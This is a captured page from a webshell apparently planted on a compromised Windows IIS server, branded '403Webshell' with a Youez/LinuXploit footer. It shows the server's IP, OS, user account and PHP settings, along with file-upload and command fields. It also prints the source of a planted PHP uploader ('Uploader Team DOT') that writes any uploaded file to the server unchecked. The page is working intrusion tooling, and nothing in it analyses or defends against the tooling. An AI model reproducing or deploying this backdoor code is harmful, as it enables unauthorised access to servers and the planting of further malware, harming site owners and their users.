403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /TMP/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /TMP/php3B6.tmp
<?php
echo "<title>Uploader Team DOT</title>Mr.Dot</br>" . php_uname() . $_SERVER["DOCUMENT_ROOT"] . "</br>";
$cwd = getcwd();
echo '<center>
  <form method="post" target="_self" enctype="multipart/form-data">
  <input type="file" size="20" name="uploads" />
  <input type="submit" value="upload" />
  </form>
</center><br>';

if (!empty($_FILES['uploads'])) {
    move_uploaded_file($_FILES['uploads']['tmp_name'], $_FILES['uploads']['name']);
    echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : " . $_FILES['uploads']['name'] . "<br>size : " . $_FILES['uploads']['size'] . "<br>type : " . $_FILES['uploads']['type'];
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit